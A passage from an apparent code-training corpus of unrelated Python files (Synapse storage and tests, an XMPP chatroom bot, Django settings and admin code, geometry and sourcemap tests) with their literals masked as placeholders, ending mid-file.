<s> import logging <EOL> from synapse . storage . prepare_database import get_statements <EOL> import ujson <EOL> logger = logging . getLogger ( __name__ ) <EOL> ALTER_TABLE = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def run_upgrade ( cur , database_engine , * args , ** kwargs ) : <EOL> for statement in get_statements ( ALTER_TABLE . splitlines ( ) ) : <EOL> cur . execute ( statement ) <EOL> cur . execute ( "<STR_LIT>" ) <EOL> rows = cur . fetchall ( ) <EOL> min_stream_id = rows [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> cur . execute ( "<STR_LIT>" ) <EOL> rows = cur . fetchall ( ) <EOL> max_stream_id = rows [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> if min_stream_id is not None and max_stream_id is not None : <EOL> progress = { <EOL> "<STR_LIT>" : min_stream_id , <EOL> "<STR_LIT>" : max_stream_id + <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> } <EOL> progress_json = ujson . dumps ( progress ) <EOL> sql = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> sql = database_engine . convert_param_style ( sql ) <EOL> cur . execute ( sql , ( "<STR_LIT>" , progress_json ) ) </s>
<s> from synapse . util . logcontext import LoggingContext <EOL> import synapse . metrics <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> metrics = synapse . metrics . get_metrics_for ( __name__ ) <EOL> block_timer = metrics . register_distribution ( <EOL> "<STR_LIT>" , <EOL> labels = [ "<STR_LIT>" ] <EOL> ) <EOL> block_ru_utime = metrics . register_distribution ( <EOL> "<STR_LIT>" , labels = [ "<STR_LIT>" ] <EOL> ) <EOL> block_ru_stime = metrics . register_distribution ( <EOL> "<STR_LIT>" , labels = [ "<STR_LIT>" ] <EOL> ) <EOL> block_db_txn_count = metrics . register_distribution ( <EOL> "<STR_LIT>" , labels = [ "<STR_LIT>" ] <EOL> ) <EOL> block_db_txn_duration = metrics . register_distribution ( <EOL> "<STR_LIT>" , labels = [ "<STR_LIT>" ] <EOL> ) <EOL> class Measure ( object ) : <EOL> __slots__ = [ <EOL> "<STR_LIT>" , "<STR_LIT:name>" , "<STR_LIT>" , "<STR_LIT:start>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" <EOL> ] <EOL> def __init__ ( self , clock , name ) : <EOL> self . clock = clock <EOL> self . name = name <EOL> self . start_context = None <EOL> self . start = None <EOL> def __enter__ ( self ) : <EOL> self . start = self . clock . time_msec ( ) <EOL> self . start_context = LoggingContext . current_context ( ) <EOL> if self . start_context : <EOL> self . ru_utime , self . ru_stime = self . start_context . get_resource_usage ( ) <EOL> self . db_txn_count = self . start_context . db_txn_count <EOL> self . db_txn_duration = self . start_context . db_txn_duration <EOL> def __exit__ ( self , exc_type , exc_val , exc_tb ) : <EOL> if exc_type is not None or not self . start_context : <EOL> return <EOL> duration = self . clock . time_msec ( ) - self . start <EOL> block_timer . inc_by ( duration , self . name ) <EOL> context = LoggingContext . current_context ( ) <EOL> if context != self . start_context : <EOL> logger . warn ( <EOL> "<STR_LIT>" , <EOL> context , self . start_context , self . name <EOL> ) <EOL> return <EOL> if not context : <EOL> logger . warn ( "<STR_LIT>" , self . name ) <EOL> return <EOL> ru_utime , ru_stime = context . get_resource_usage ( ) <EOL> block_ru_utime . inc_by ( ru_utime - self . ru_utime , self . name ) <EOL> block_ru_stime . inc_by ( ru_stime - self . ru_stime , self . name ) <EOL> block_db_txn_count . inc_by ( context . db_txn_count - self . db_txn_count , self . name ) <EOL> block_db_txn_duration . inc_by ( <EOL> context . db_txn_duration - self . db_txn_duration , self . name <EOL> ) </s>
<s> from twisted . internet import defer <EOL> from . import V2AlphaRestTestCase <EOL> from synapse . rest . client . v2_alpha import filter <EOL> from synapse . api . errors import StoreError <EOL> class FilterTestCase ( V2AlphaRestTestCase ) : <EOL> USER_ID = "<STR_LIT>" <EOL> TO_REGISTER = [ filter ] <EOL> def make_datastore_mock ( self ) : <EOL> datastore = super ( FilterTestCase , self ) . make_datastore_mock ( ) <EOL> self . _user_filters = { } <EOL> def add_user_filter ( user_localpart , definition ) : <EOL> filters = self . _user_filters . setdefault ( user_localpart , [ ] ) <EOL> filter_id = len ( filters ) <EOL> filters . append ( definition ) <EOL> return defer . succeed ( filter_id ) <EOL> datastore . add_user_filter = add_user_filter <EOL> def get_user_filter ( user_localpart , filter_id ) : <EOL> if user_localpart not in self . _user_filters : <EOL> raise StoreError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> filters = self . _user_filters [ user_localpart ] <EOL> if filter_id >= len ( filters ) : <EOL> raise StoreError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> return defer . succeed ( filters [ filter_id ] ) <EOL> datastore . get_user_filter = get_user_filter <EOL> return datastore <EOL> @ defer . inlineCallbacks <EOL> def test_add_filter ( self ) : <EOL> ( code , response ) = yield self . mock_resource . trigger ( <EOL> "<STR_LIT:POST>" , "<STR_LIT>" % ( self . USER_ID ) , '<STR_LIT>' <EOL> ) <EOL> self . assertEquals ( <NUM_LIT:200> , code ) <EOL> self . assertEquals ( { "<STR_LIT>" : "<STR_LIT:0>" } , response ) <EOL> self . assertIn ( "<STR_LIT>" , self . _user_filters ) <EOL> self . assertEquals ( len ( self . _user_filters [ "<STR_LIT>" ] ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( { "<STR_LIT:type>" : [ "<STR_LIT>" ] } , self . _user_filters [ "<STR_LIT>" ] [ <NUM_LIT:0> ] ) <EOL> @ defer . inlineCallbacks <EOL> def test_get_filter ( self ) : <EOL> self . _user_filters [ "<STR_LIT>" ] = [ <EOL> { "<STR_LIT:type>" : [ "<STR_LIT>" ] } <EOL> ] <EOL> ( code , response ) = yield self . mock_resource . trigger_get ( <EOL> "<STR_LIT>" % ( self . USER_ID ) <EOL> ) <EOL> self . assertEquals ( <NUM_LIT:200> , code ) <EOL> self . assertEquals ( { "<STR_LIT:type>" : [ "<STR_LIT>" ] } , response ) <EOL> @ defer . inlineCallbacks <EOL> def test_get_filter_no_id ( self ) : <EOL> self . _user_filters [ "<STR_LIT>" ] = [ <EOL> { "<STR_LIT:type>" : [ "<STR_LIT>" ] } <EOL> ] <EOL> ( code , response ) = yield self . mock_resource . trigger_get ( <EOL> "<STR_LIT>" % ( self . USER_ID ) <EOL> ) <EOL> self . assertEquals ( <NUM_LIT> , code ) <EOL> @ defer . inlineCallbacks <EOL> def test_get_filter_no_user ( self ) : <EOL> ( code , response ) = yield self . mock_resource . trigger_get ( <EOL> "<STR_LIT>" % ( self . USER_ID ) <EOL> ) <EOL> self . assertEquals ( <NUM_LIT> , code ) </s>
<s> import ctypes <EOL> HASH_RING_OK = <NUM_LIT:0> <EOL> HASH_RING_ERR = <NUM_LIT:1> <EOL> HASH_FUNCTION = ctypes . c_uint8 <EOL> HASH_FUNCTION_SHA1 = <NUM_LIT:1> <EOL> HASH_FUNCTION_MD5 = <NUM_LIT:2> <EOL> HASH_RING_DEBUG = <NUM_LIT:1> <EOL> HASH_RING_MODE_NORMAL = <NUM_LIT:1> <EOL> HASH_RING_MODE_LIBMEMCACHED_COMPAT = <NUM_LIT:2> <EOL> HASH_MODE = ctypes . c_uint8 </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = "<STR_LIT>" <EOL> __needs__ = '<STR_LIT>' <EOL> __version__ = "<STR_LIT>" <EOL> __author__ = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> from simpleparse . parser import Parser <EOL> from simpleparse . common import numbers , strings , chartypes <EOL> dec = r"""<STR_LIT>""" <EOL> parser = Parser ( dec , '<STR_LIT>' ) <EOL> entry_parser = Parser ( dec , '<STR_LIT>' ) <EOL> def Parse ( src , processor = None ) : <EOL> '''<STR_LIT>''' <EOL> return parser . parse ( src , processor = processor ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import sys , pprint <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> src = open ( sys . argv [ <NUM_LIT:1> ] ) . read ( ) <EOL> taglist = Parse ( src ) <EOL> pprint . pprint ( taglist ) </s>
<s> from builtins import str <EOL> import os <EOL> import sys <EOL> try : <EOL> from importlib import import_module <EOL> except ImportError : <EOL> from django . utils . importlib import import_module <EOL> import django <EOL> from . exceptions import InvalidSettingsFactory , SettingsFactoryDoesNotExist <EOL> from . decorators import callable_setting <EOL> from . importers import SettingsImporter <EOL> from . settings import DjangoDefaults , AppSettings , PrefixedSettings <EOL> from . switching import switcher <EOL> from cbsettings . pkgmeta import * <EOL> ENVIRONMENT_VARIABLE = '<STR_LIT>' <EOL> DJANGO_SETTINGS_MODULE = django . conf . ENVIRONMENT_VARIABLE <EOL> def configure ( factory = None , ** kwargs ) : <EOL> if not factory : <EOL> factory = os . environ . get ( ENVIRONMENT_VARIABLE ) <EOL> if not factory : <EOL> raise ImportError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ENVIRONMENT_VARIABLE ) <EOL> if '<STR_LIT:.>' in factory : <EOL> factory_module , factory_name = factory . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> try : <EOL> mod = import_module ( factory_module ) <EOL> factory_obj = getattr ( mod , factory_name ) <EOL> except ( ImportError , AttributeError ) as err : <EOL> raise SettingsFactoryDoesNotExist ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( factory , err ) ) <EOL> settings_obj = factory_obj ( ) <EOL> settings_dict = dict ( ( k , getattr ( settings_obj , k ) ) for k in <EOL> dir ( settings_obj ) if not str ( k ) . startswith ( '<STR_LIT:_>' ) ) <EOL> if '<STR_LIT>' not in settings_dict : <EOL> settings_dict [ '<STR_LIT>' ] = ( <EOL> '<STR_LIT>' % ( factory_module , factory_name ) ) <EOL> sys . meta_path . insert ( <EOL> <NUM_LIT:0> , <EOL> SettingsImporter ( settings_dict [ '<STR_LIT>' ] , settings_dict ) <EOL> ) <EOL> os . environ [ DJANGO_SETTINGS_MODULE ] = settings_dict [ '<STR_LIT>' ] <EOL> return mod , settings_obj <EOL> else : <EOL> raise InvalidSettingsFactory ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % factory ) </s>
<s> from copy import copy <EOL> from hashlib import md5 <EOL> from pickle import MARK , DICT <EOL> try : <EOL> from pickle import _Pickler <EOL> except ImportError : <EOL> from pickle import Pickler as _Pickler <EOL> from . lib import StringIO <EOL> class CanonicalizingPickler ( _Pickler ) : <EOL> dispatch = copy ( _Pickler . dispatch ) <EOL> def save_set ( self , obj ) : <EOL> rv = obj . __reduce_ex__ ( <NUM_LIT:0> ) <EOL> rv = ( rv [ <NUM_LIT:0> ] , ( sorted ( rv [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) , ) , rv [ <NUM_LIT:2> ] ) <EOL> self . save_reduce ( obj = obj , * rv ) <EOL> dispatch [ set ] = save_set <EOL> def save_dict ( self , obj ) : <EOL> write = self . write <EOL> write ( MARK + DICT ) <EOL> self . memoize ( obj ) <EOL> self . _batch_setitems ( sorted ( obj . items ( ) ) ) <EOL> dispatch [ dict ] = save_dict <EOL> def pickle ( obj ) : <EOL> file = StringIO ( ) <EOL> CanonicalizingPickler ( file , <NUM_LIT:0> ) . dump ( obj ) <EOL> return md5 ( file . getvalue ( ) ) . hexdigest ( ) </s>
<s> from nose . tools import assert_false <EOL> from mock import Mock , PropertyMock , patch <EOL> from . models import Photo <EOL> def test_dont_access_source ( ) : <EOL> """<STR_LIT>""" <EOL> pmock = PropertyMock ( ) <EOL> pmock . __get__ = Mock ( ) <EOL> with patch . object ( Photo , '<STR_LIT>' , pmock ) : <EOL> photo = Photo ( ) <EOL> assert_false ( pmock . __get__ . called ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . contrib import admin <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from . import models <EOL> class ContactAdmin ( admin . ModelAdmin ) : <EOL> fieldsets = ( <EOL> ( None , { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:user>' , '<STR_LIT>' , '<STR_LIT>' ) } ) , <EOL> ( _ ( '<STR_LIT>' ) , { <EOL> '<STR_LIT>' : models . Contact . address_fields ( '<STR_LIT>' ) , <EOL> } ) , <EOL> ( _ ( '<STR_LIT>' ) , { <EOL> '<STR_LIT>' : ( <EOL> [ '<STR_LIT>' ] <EOL> + models . Contact . address_fields ( '<STR_LIT>' ) ) , <EOL> } ) , <EOL> ( _ ( '<STR_LIT>' ) , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> } ) , <EOL> ) <EOL> list_display = ( <EOL> '<STR_LIT:user>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> list_filter = ( '<STR_LIT>' , ) <EOL> ordering = ( '<STR_LIT>' , ) <EOL> raw_id_fields = ( '<STR_LIT:user>' , ) <EOL> search_fields = ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> + models . Contact . address_fields ( '<STR_LIT>' ) <EOL> + models . Contact . address_fields ( '<STR_LIT>' ) <EOL> ) <EOL> admin . site . register ( models . Contact , ContactAdmin ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . dispatch import Signal <EOL> contact_created = Signal ( <EOL> providing_args = [ '<STR_LIT:user>' , '<STR_LIT>' , '<STR_LIT:password>' , '<STR_LIT>' ] , <EOL> ) <EOL> order_confirmed = Signal ( <EOL> providing_args = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ) <EOL> order_paid = Signal ( <EOL> providing_args = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import xmpp <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> class Chatroom ( object ) : <EOL> """<STR_LIT>""" <EOL> command_patterns = ( ) <EOL> def __init__ ( self , name , params ) : <EOL> self . command_patterns = [ ] <EOL> for pattern in type ( self ) . command_patterns : <EOL> self . command_patterns . append ( ( re . compile ( pattern [ <NUM_LIT:0> ] ) , pattern [ <NUM_LIT:1> ] ) ) <EOL> self . name = name <EOL> self . params = params <EOL> self . jid = xmpp . protocol . JID ( self . params [ '<STR_LIT>' ] ) <EOL> def connect ( self ) : <EOL> """<STR_LIT>""" <EOL> for m in self . params [ '<STR_LIT>' ] : <EOL> m [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> m . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . client = xmpp . Client ( self . jid . getDomain ( ) , debug = [ ] ) <EOL> conn = self . client . connect ( server = self . params [ '<STR_LIT>' ] ) <EOL> if not conn : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> auth = self . client . auth ( self . jid . getNode ( ) , self . params [ '<STR_LIT>' ] ) <EOL> if not auth : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . client . RegisterHandler ( '<STR_LIT:message>' , self . on_message ) <EOL> self . client . RegisterHandler ( '<STR_LIT>' , self . on_presence ) <EOL> self . client . sendInitPresence ( requestRoster = <NUM_LIT:0> ) <EOL> roster = self . client . getRoster ( ) <EOL> for m in self . params [ '<STR_LIT>' ] : <EOL> self . invite_user ( m , roster = roster ) <EOL> def get_member ( self , jid , default = None ) : <EOL> """<STR_LIT>""" <EOL> member = filter ( lambda m : m [ '<STR_LIT>' ] == jid , self . params [ '<STR_LIT>' ] ) <EOL> if len ( member ) == <NUM_LIT:1> : <EOL> return member [ <NUM_LIT:0> ] <EOL> elif len ( member ) == <NUM_LIT:0> : <EOL> return default <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % ( jid , ) ) <EOL> def is_member ( self , m ) : <EOL> """<STR_LIT>""" <EOL> if not m : <EOL> return False <EOL> elif isinstance ( m , basestring ) : <EOL> jid = m <EOL> else : <EOL> jid = m [ '<STR_LIT>' ] <EOL> is_member = len ( filter ( lambda m : m [ '<STR_LIT>' ] == jid and m . get ( '<STR_LIT>' ) in ( '<STR_LIT>' , '<STR_LIT>' ) , self . params [ '<STR_LIT>' ] ) ) > <NUM_LIT:0> <EOL> return is_member <EOL> def invite_user ( self , new_member , inviter = None , roster = None ) : <EOL> """<STR_LIT>""" <EOL> roster = roster or self . client . getRoster ( ) <EOL> jid = new_member [ '<STR_LIT>' ] <EOL> logger . info ( '<STR_LIT>' % ( jid , roster . getSubscription ( jid ) ) ) <EOL> if jid in roster . keys ( ) and roster . getSubscription ( jid ) in [ '<STR_LIT>' , '<STR_LIT:to>' ] : <EOL> new_member [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if inviter : <EOL> self . send_message ( '<STR_LIT>' % ( jid , ) , inviter ) <EOL> else : <EOL> new_member [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . broadcast ( '<STR_LIT>' % ( jid , ) ) <EOL> subscribe_presence = xmpp . dispatcher . Presence ( to = jid , typ = '<STR_LIT>' ) <EOL> if '<STR_LIT>' in self . params : <EOL> subscribe_presence . addChild ( name = '<STR_LIT>' , namespace = xmpp . protocol . NS_NICK , payload = self . params [ '<STR_LIT>' ] ) <EOL> self . client . send ( subscribe_presence ) <EOL> if not self . is_member ( new_member ) : <EOL> new_member . setdefault ( '<STR_LIT>' , jid . split ( '<STR_LIT:@>' ) [ <NUM_LIT:0> ] ) <EOL> self . params [ '<STR_LIT>' ] . append ( new_member ) <EOL> def kick_user ( self , jid ) : <EOL> """<STR_LIT>""" <EOL> for member in filter ( lambda m : m [ '<STR_LIT>' ] == jid , self . params [ '<STR_LIT>' ] ) : <EOL> member [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . send_message ( '<STR_LIT>' % ( self . name , ) , member ) <EOL> self . client . sendPresence ( jid = member [ '<STR_LIT>' ] , typ = '<STR_LIT>' ) <EOL> self . client . sendPresence ( jid = member [ '<STR_LIT>' ] , typ = '<STR_LIT>' ) <EOL> self . broadcast ( '<STR_LIT>' % ( jid , ) ) <EOL> def send_message ( self , body , to , quiet = False , html_body = None ) : <EOL> """<STR_LIT>""" <EOL> if to . get ( '<STR_LIT>' ) : <EOL> to [ '<STR_LIT>' ] . append ( body ) <EOL> else : <EOL> if not quiet : <EOL> logger . info ( '<STR_LIT>' % ( self . name , to [ '<STR_LIT>' ] , body ) ) <EOL> message = xmpp . protocol . Message ( to = to [ '<STR_LIT>' ] , body = body , typ = '<STR_LIT>' ) <EOL> if html_body : <EOL> html = xmpp . Node ( '<STR_LIT:html>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> html . addChild ( node = xmpp . simplexml . XML2Node ( "<STR_LIT>" + html_body . encode ( '<STR_LIT:utf-8>' ) + "<STR_LIT>" ) ) <EOL> message . addChild ( node = html ) <EOL> self . client . send ( message ) <EOL> def broadcast ( self , body , html_body = None , exclude = ( ) ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' % ( self . name , body , ) ) <EOL> for member in filter ( lambda m : m . get ( '<STR_LIT>' ) == '<STR_LIT>' and m not in exclude , self . params [ '<STR_LIT>' ] ) : <EOL> logger . debug ( member [ '<STR_LIT>' ] ) <EOL> self . send_message ( body , member , html_body = html_body , quiet = True ) <EOL> def do_marco ( self , sender , body , args ) : <EOL> """<STR_LIT>""" <EOL> self . send_message ( '<STR_LIT>' , sender ) <EOL> def do_invite ( self , sender , body , args ) : <EOL> """<STR_LIT>""" <EOL> for invitee in args : <EOL> new_member = { '<STR_LIT>' : invitee } <EOL> self . invite_user ( new_member , inviter = sender ) <EOL> def do_kick ( self , sender , body , args ) : <EOL> """<STR_LIT>""" <EOL> if sender . get ( '<STR_LIT>' ) != True : return <EOL> for user in args : <EOL> self . kick_user ( user ) <EOL> def do_mute ( self , sender , body , args ) : <EOL> """<STR_LIT>""" <EOL> if sender . get ( '<STR_LIT>' ) : <EOL> self . send_message ( '<STR_LIT>' , sender ) <EOL> else : <EOL> self . broadcast ( '<STR_LIT>' % ( sender [ '<STR_LIT>' ] , ) ) <EOL> sender [ '<STR_LIT>' ] = [ ] <EOL> sender [ '<STR_LIT>' ] = True <EOL> def do_unmute ( self , sender , body , args ) : <EOL> """<STR_LIT>""" <EOL> if sender . get ( '<STR_LIT>' ) : <EOL> sender [ '<STR_LIT>' ] = False <EOL> self . broadcast ( '<STR_LIT>' % ( sender [ '<STR_LIT>' ] , ) ) <EOL> for msg in sender . get ( '<STR_LIT>' , [ ] ) : <EOL> self . send_message ( msg , sender ) <EOL> sender [ '<STR_LIT>' ] = [ ] <EOL> else : <EOL> self . send_message ( '<STR_LIT>' , sender ) <EOL> def on_disconnect ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . error ( '<STR_LIT>' ) <EOL> def on_presence ( self , session , presence ) : <EOL> """<STR_LIT>""" <EOL> from_jid = presence . getFrom ( ) <EOL> is_member = self . is_member ( from_jid . getStripped ( ) ) <EOL> if is_member : <EOL> member = self . get_member ( from_jid . getStripped ( ) ) <EOL> else : <EOL> member = None <EOL> logger . info ( '<STR_LIT>' % ( from_jid , is_member , presence . getType ( ) ) ) <EOL> if presence . getType ( ) == '<STR_LIT>' : <EOL> if is_member : <EOL> logger . info ( '<STR_LIT>' % ( from_jid , ) ) <EOL> member [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> pass <EOL> elif presence . getType ( ) == '<STR_LIT>' : <EOL> if is_member : <EOL> logger . info ( '<STR_LIT>' % ( from_jid , ) ) <EOL> self . client . sendPresence ( jid = from_jid , typ = '<STR_LIT>' ) <EOL> member [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . broadcast ( '<STR_LIT>' % ( from_jid , ) ) <EOL> else : <EOL> pass <EOL> elif presence . getType ( ) == None : <EOL> if is_member : <EOL> member [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> elif presence . getType ( ) == '<STR_LIT>' : <EOL> if is_member : <EOL> member [ '<STR_LIT>' ] -= <NUM_LIT:1> <EOL> else : <EOL> logger . info ( '<STR_LIT>' % ( presence . getType ( ) , from_jid ) ) <EOL> def on_message ( self , con , event ) : <EOL> """<STR_LIT>""" <EOL> msg_type = event . getType ( ) <EOL> nick = event . getFrom ( ) . getResource ( ) <EOL> from_jid = event . getFrom ( ) . getStripped ( ) <EOL> body = event . getBody ( ) <EOL> if msg_type == '<STR_LIT>' and body is None : <EOL> return <EOL> logger . debug ( '<STR_LIT>' % ( msg_type , from_jid , nick , body , ) ) <EOL> sender = filter ( lambda m : m [ '<STR_LIT>' ] == from_jid , self . params [ '<STR_LIT>' ] ) <EOL> should_process = msg_type in [ '<STR_LIT:message>' , '<STR_LIT>' , None ] and body is not None and len ( sender ) == <NUM_LIT:1> <EOL> if not should_process : return <EOL> sender = sender [ <NUM_LIT:0> ] <EOL> try : <EOL> for p in self . command_patterns : <EOL> reg , cmd = p <EOL> m = reg . match ( body ) <EOL> if m : <EOL> logger . info ( '<STR_LIT>' % ( cmd , ) ) <EOL> function = getattr ( self , str ( cmd ) , None ) <EOL> if function : <EOL> return function ( sender , body , m ) <EOL> words = body . split ( '<STR_LIT:U+0020>' ) <EOL> cmd , args = words [ <NUM_LIT:0> ] , words [ <NUM_LIT:1> : ] <EOL> if cmd and cmd [ <NUM_LIT:0> ] == '<STR_LIT:/>' : <EOL> cmd = cmd [ <NUM_LIT:1> : ] <EOL> command_handler = getattr ( self , '<STR_LIT>' + cmd , None ) <EOL> if command_handler : <EOL> return command_handler ( sender , body , args ) <EOL> broadcast_body = '<STR_LIT>' % ( sender [ '<STR_LIT>' ] , body , ) <EOL> return self . broadcast ( broadcast_body , exclude = ( sender , ) ) <EOL> except : <EOL> logger . exception ( '<STR_LIT>' % ( body , sender [ '<STR_LIT>' ] ) ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> import unittest <EOL> import chumpy as ch <EOL> from chumpy import Ch <EOL> import numpy as np <EOL> from util_tests import get_earthmesh <EOL> class TestGeometry ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> def test_rodrigues ( self ) : <EOL> from geometry import Rodrigues <EOL> rt = np . random . randn ( <NUM_LIT:3> ) <EOL> rt2 = rt + np . random . rand ( <NUM_LIT:3> ) * <NUM_LIT> <EOL> foo1 = Rodrigues ( rt = rt ) <EOL> foo2 = Rodrigues ( rt = rt2 ) <EOL> empirical = ( foo2 . r - foo1 . r ) . flatten ( ) <EOL> predicted = foo1 . dr_wrt ( foo1 . rt ) . dot ( rt2 - rt ) <EOL> self . assertTrue ( np . max ( np . abs ( empirical - predicted ) ) < <NUM_LIT> ) <EOL> def test_vert_normals ( self ) : <EOL> from geometry import VertNormals <EOL> import numpy as np <EOL> mesh = get_earthmesh ( np . zeros ( <NUM_LIT:3> ) , np . zeros ( <NUM_LIT:3> ) ) <EOL> v , f = mesh . v * <NUM_LIT> , mesh . f <EOL> vn1 = VertNormals ( f = f , v = v ) <EOL> dr_predicted = vn1 . dr_wrt ( vn1 . v ) . copy ( ) <EOL> eps = <NUM_LIT> * np . random . randn ( v . size ) . reshape ( v . shape ) <EOL> v += eps <EOL> vn2 = VertNormals ( v = v , f = f ) <EOL> empirical_diff = ( vn2 . r - vn1 . r ) . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> predicted_diff = dr_predicted . dot ( eps . flatten ( ) ) . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> if False : <EOL> print np . max ( np . abs ( empirical_diff - predicted_diff ) ) <EOL> print empirical_diff [ : <NUM_LIT:6> ] <EOL> print predicted_diff [ : <NUM_LIT:6> ] <EOL> self . assertTrue ( np . max ( np . abs ( empirical_diff - predicted_diff ) ) < <NUM_LIT> ) <EOL> suite = unittest . TestLoader ( ) . loadTestsFromTestCase ( TestGeometry ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from . base import BaseTestCase <EOL> from . models import EmailUser <EOL> from django . forms import ValidationError <EOL> from sudo . forms import SudoForm <EOL> class SudoFormTestCase ( BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( SudoFormTestCase , self ) . setUp ( ) <EOL> self . login ( ) <EOL> def test_integration_empty ( self ) : <EOL> self . assertFalse ( SudoForm ( self . user ) . is_valid ( ) ) <EOL> def test_integration_invalid_password ( self ) : <EOL> self . assertFalse ( <EOL> SudoForm ( self . user , { '<STR_LIT:password>' : '<STR_LIT>' } ) . is_valid ( ) <EOL> ) <EOL> def test_integration_valid_password ( self ) : <EOL> self . assertTrue ( <EOL> SudoForm ( self . user , { '<STR_LIT:password>' : '<STR_LIT:foo>' } ) . is_valid ( ) <EOL> ) <EOL> def test_integration_secondary_auth_valid_password ( self ) : <EOL> self . assertTrue ( <EOL> SudoForm ( self . user , { '<STR_LIT:password>' : '<STR_LIT>' } ) . is_valid ( ) <EOL> ) <EOL> def test_clean_password_invalid_password ( self ) : <EOL> with self . assertRaises ( ValidationError ) : <EOL> SudoForm ( self . user , { '<STR_LIT:password>' : '<STR_LIT>' } ) . clean_password ( ) <EOL> def test_clean_password_valid_password ( self ) : <EOL> password = '<STR_LIT:foo>' <EOL> self . assertEqual ( <EOL> SudoForm ( self . user , { '<STR_LIT:password>' : password } ) . clean_password ( ) , <EOL> password <EOL> ) <EOL> def test_clean_password_secondary_auth_valid_password ( self ) : <EOL> password = '<STR_LIT>' <EOL> self . assertEqual ( <EOL> SudoForm ( self . user , { '<STR_LIT:password>' : password } ) . clean_password ( ) , <EOL> password <EOL> ) <EOL> def test_integration_custom_user ( self ) : <EOL> self . login ( EmailUser ) <EOL> self . assertTrue ( <EOL> SudoForm ( self . user , { '<STR_LIT:password>' : '<STR_LIT:foo>' } ) . is_valid ( ) <EOL> ) </s>
<s> try : <EOL> import unittest2 as unittest <EOL> except ImportError : <EOL> import unittest <EOL> from sourcemap . objects import Token , SourceMapIndex <EOL> class TokenTestCase ( unittest . TestCase ) : <EOL> def test_eq ( self ) : <EOL> assert Token ( <NUM_LIT:1> , <NUM_LIT:1> , '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT:1> , '<STR_LIT>' ) == Token ( <NUM_LIT:1> , <NUM_LIT:1> , '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> assert Token ( <NUM_LIT> , <NUM_LIT:1> , '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT:1> , '<STR_LIT>' ) != Token ( <NUM_LIT:1> , <NUM_LIT:1> , '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> class SourceMapIndexTestCase ( unittest . TestCase ) : <EOL> def get_index ( self ) : <EOL> tokens = [ <EOL> Token ( dst_line = <NUM_LIT:0> , dst_col = <NUM_LIT:0> ) , <EOL> Token ( dst_line = <NUM_LIT:0> , dst_col = <NUM_LIT:5> ) , <EOL> Token ( dst_line = <NUM_LIT:1> , dst_col = <NUM_LIT:0> ) , <EOL> Token ( dst_line = <NUM_LIT:1> , dst_col = <NUM_LIT:12> ) , <EOL> ] <EOL> rows = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:12> ] , <EOL> ] <EOL> index = { <EOL> ( <NUM_LIT:0> , <NUM_LIT:0> ) : tokens [ <NUM_LIT:0> ] , <EOL> ( <NUM_LIT:0> , <NUM_LIT:5> ) : tokens [ <NUM_LIT:1> ] , <EOL> ( <NUM_LIT:1> , <NUM_LIT:0> ) : tokens [ <NUM_LIT:2> ] , 